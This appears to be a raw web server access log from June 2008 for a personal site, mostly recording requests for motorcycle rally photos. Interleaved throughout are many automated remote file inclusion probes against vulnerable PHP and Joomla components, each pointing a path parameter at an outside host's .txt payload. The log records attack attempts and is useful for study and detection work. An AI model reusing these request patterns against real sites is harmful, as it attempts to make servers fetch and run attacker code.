166.135.115.200 - - [09/Jun/2008:11:13:18 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_016M.jpg HTTP/1.1" 200 70257 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:13:20 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_013M.jpg HTTP/1.1" 200 60607 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:13:20 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_008M.jpg HTTP/1.1" 200 80517 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:13:20 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_020M.jpg HTTP/1.1" 200 98199 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:13:20 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_071M.jpg HTTP/1.1" 200 119050 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
74.6.22.189 - - [09/Jun/2008:11:13:20 -0700] "GET /logs/access_080204.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:13:21 -0700] "GET /logs/access_071228.log//modules/mod_as_category.php?mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:13:25 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0118.jpg HTTP/1.1" 200 395556 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:13:28 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:13:28 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:13:29 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:13:35 -0700] "GET /logs/access_071224.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:13:36 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_059M.jpg HTTP/1.1" 200 68572 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:13:37 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_061M.jpg HTTP/1.1" 200 70278 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:13:38 -0700] "GET /bikes/dteel/2008-05-30/Panarama_CreSTOC_2008M.jpg HTTP/1.1" 200 14593 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:13:39 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_044M.jpg HTTP/1.1" 200 77224 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:13:39 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0095.jpg HTTP/1.1" 200 496796 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:13:39 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:13:40 -0700] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:13:43 -0700] "GET /logs/access_080216.log//modules/mod_as_category.php?mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.11.122.72 - - [09/Jun/2008:11:13:51 -0700] "GET /logs/access.log/index.php?p=http://www.safonov.sumy.ua/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.122.72 - - [09/Jun/2008:11:13:52 -0700] "GET /index.php?p=http://www.safonov.sumy.ua/echo.txt? HTTP/1.1" 200 16809 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.122.72 - - [09/Jun/2008:11:13:52 -0700] "GET /logs/index.php?p=http://www.safonov.sumy.ua/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:13:53 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0055.jpg HTTP/1.1" 200 482637 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:14:01 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_053M.jpg HTTP/1.1" 200 108392 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:14:02 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_058M.jpg HTTP/1.1" 200 120428 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
77.55.90.2 - - [09/Jun/2008:11:14:04 -0700] "GET /logs/access_080216.log//adminfoot.php?path[docroot]=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.55.90.2 - - [09/Jun/2008:11:14:05 -0700] "GET //adminfoot.php?path[docroot]=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.55.90.2 - - [09/Jun/2008:11:14:05 -0700] "GET /logs//adminfoot.php?path[docroot]=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:14:06 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_022M.jpg HTTP/1.1" 200 81615 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:14:06 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0052.jpg HTTP/1.1" 200 433536 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:14:09 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:14:09 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:14:09 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:14:10 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_011M.jpg HTTP/1.1" 200 72607 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
62.75.158.23 - - [09/Jun/2008:11:14:14 -0700] "GET /logs/access.log/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [09/Jun/2008:11:14:14 -0700] "GET /errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [09/Jun/2008:11:14:15 -0700] "GET /logs/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:14:16 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:14:20 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0116.jpg HTTP/1.1" 200 454696 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
62.75.158.23 - - [09/Jun/2008:11:14:26 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:14:27 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_009M.jpg HTTP/1.1" 200 56619 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:14:30 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_015M.jpg HTTP/1.1" 200 59608 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:14:32 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_076M.jpg HTTP/1.1" 200 24103 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:14:32 -0700] "GET /logs/access_071228.log//modules/mod_as_category.php?mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:11:14:33 -0700] "GET /logs/access_080215.log/page.php?doc=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:11:14:33 -0700] "GET /page.php?doc=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:11:14:33 -0700] "GET /logs/page.php?doc=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:14:34 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0079.jpg HTTP/1.1" 200 418779 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
208.78.243.180 - - [09/Jun/2008:11:14:36 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.243.180 - - [09/Jun/2008:11:14:36 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:14:36 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_060M.jpg HTTP/1.1" 200 76230 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:14:43 -0700] "GET /logs/access_080216.log//modules/mod_as_category.php?mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:14:43 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:14:44 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:14:44 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:14:48 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0059.jpg HTTP/1.1" 200 418326 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:14:54 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:14:54 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:14:57 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_067M.jpg HTTP/1.1" 200 56379 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
195.2.228.10 - - [09/Jun/2008:11:14:57 -0700] "GET /logs/access_080312.log/?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:11:15:00 -0700] "GET /logs/access_080429.log//modules/vwar/admin/admin.php?vwar_root=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.2.228.10 - - [09/Jun/2008:11:15:01 -0700] "GET /?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id.txt? HTTP/1.1" 200 16863 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:15:01 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0060.jpg HTTP/1.1" 200 373725 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
195.2.228.10 - - [09/Jun/2008:11:15:02 -0700] "GET /logs/?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id.txt? HTTP/1.1" 200 51131 "-" "libwww-perl/5.805" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:15:04 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_056M.jpg HTTP/1.1" 200 68291 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:15:09 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_035M.jpg HTTP/1.1" 200 96763 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:15:15 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0016.jpg HTTP/1.1" 200 275513 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
64.20.46.121 - - [09/Jun/2008:11:15:20 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [09/Jun/2008:11:15:20 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [09/Jun/2008:11:15:20 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:15:29 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0029.jpg HTTP/1.1" 200 446605 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:15:43 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0025.jpg HTTP/1.1" 200 492834 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:15:48 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:15:48 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:15:56 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0066.jpg HTTP/1.1" 200 335169 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:16:07 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:16:08 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:16:08 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:16:10 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0113.jpg HTTP/1.1" 200 312924 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:16:19 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:16:19 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:16:19 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:16:23 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0032.jpg HTTP/1.1" 200 305289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:16:37 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0046.jpg HTTP/1.1" 200 366761 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:16:51 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0126.jpg HTTP/1.1" 200 401657 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:16:53 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:16:53 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:16:53 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:16:56 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:16:58 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:16:58 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:16:59 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:17:00 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:17:00 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:17:00 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:17:03 -0700] "GET /logs/access_080106.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:17:05 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0093.jpg HTTP/1.1" 200 508444 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:17:09 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:17:09 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:17:10 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
